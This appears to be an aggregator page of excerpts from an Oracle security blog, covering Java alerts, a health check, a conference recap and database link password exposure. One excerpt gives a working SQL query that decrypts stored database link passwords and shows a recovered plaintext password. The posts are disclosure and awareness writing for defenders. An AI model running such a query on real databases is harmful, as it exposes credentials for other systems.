User login

Aggregator

Please use the contact form to include your blog here, suggest a feed, or give feedback.

If your blog is aggregated on OraFAQ, you may want to display this image on your blog:

Paul Wright

(nix, oracle, java, www, cloud ) intersect (safety, security, reliability, integrity)

URL: http://www.oracleforensics.com/wordpress

Updated: 1 hour 4 min ago

Another Java Security Alert

Tue, 2013-03-05 17:42

Hi Oracle Security Folks, Following the tradition for one off Java Security Alerts Oracle Critical Patch Updates and Security Alerts: http://www.oracle.com/technetwork/topics/security/alerts-086861.html Oracle Security Alert for CVE-2013-1493: http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html The reporters http://blog.fireeye.com/research/2013/02/yaj0-yet-another-java-zero-day-2.html say it is an unreliable exploit. Of course it depends on Java being used in the browser so one fix is to unplug the JVM [...]

Oracle Dictionary Integrity Health Check

Mon, 2013-02-11 13:14

Hi, It is good to check the integrity or health of a system to avoid future problems. DBMS_HM.RUN_CHECK(‘Dictionary Integrity Check’, ‘my_run’); SET LONG 100000 SET LONGCHUNKSIZE 1000 SET PAGESIZE 1000 SET LINESIZE 512 SELECT DBMS_HM.GET_RUN_REPORT(‘MY_RUN’) from dual; SQL> SELECT DBMS_HM.GET_RUN_REPORT(‘MY_RUN’) from dual; DBMS_HM.GET_RUN_REPORT(‘MY_RUN’) ——————————————————————————- ——————————————————————————- ——————————————————————————- ——————————————————————————- Basic Run Information Run Name : my_run Run [...]

Java Security Alert

Sun, 2013-01-13 18:20

New Year – New vulnerabilities…yes it’s alert season again, with the main patch out on the 15th, but an out of band alert today for the Java 0 day. It is good to see Oracle taking this well publicised issue so seriously. Here is the alert – http://www.oracle.com/technetwork/topics/security/alerts-086861.html For an excellent advanced analysis please see [...]

UKOUG 2012 in a nutshell

Wed, 2012-12-12 18:21

Hi Oracle Security Folks, UKOUG 2012 in a nutshell: OAK Table day highlight was Julian’s analysis of RAT capture formats, which made reverse engineering proprietory formats look a lot easier than it should do. Christian’s super secret talk was so secret that it was not given, but managed to catch up on that later. Monday [...]

SYS Security

Thu, 2012-11-29 00:52

Hello Folks, A few people have told me that they thought only SYS could select db link passwords. Truth is any user with SELECT_CATALOG_ROLE can select the passwords from ku$_dblink_view as well. SQL> select name, userid, utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), 4353, (substr(passwordx,3,16)))) password from ku$_dblink_view; NAME -------------------------------------------------------------------------------- USERID ------------------------------ PASSWORD -------------------------------------------------------------------------------- TEST_LINK.ENTERPRISE.INTERNAL.UK DBLINK_ACCOUNT mongo If missing execute on [...]

Database Link Security

Thu, 2012-11-22 17:37

Hello Oracle Security folks, Good news and bad news – which would you like first? Ok.. so the bad news is that these user/role/privileges can select and decrypt DBLink passwords on 11.2, as the key to decrypt the ciphertext is included in the password itself. •SYS •SYSDBA •DBA •SYS WITHOUT SYSDBA •SYSASM •EXP_FULL_DATABASE •DATAPUMP_EXP_FULL_DATABASE •DATAPUMP_IMP_FULL_DATABASE [...]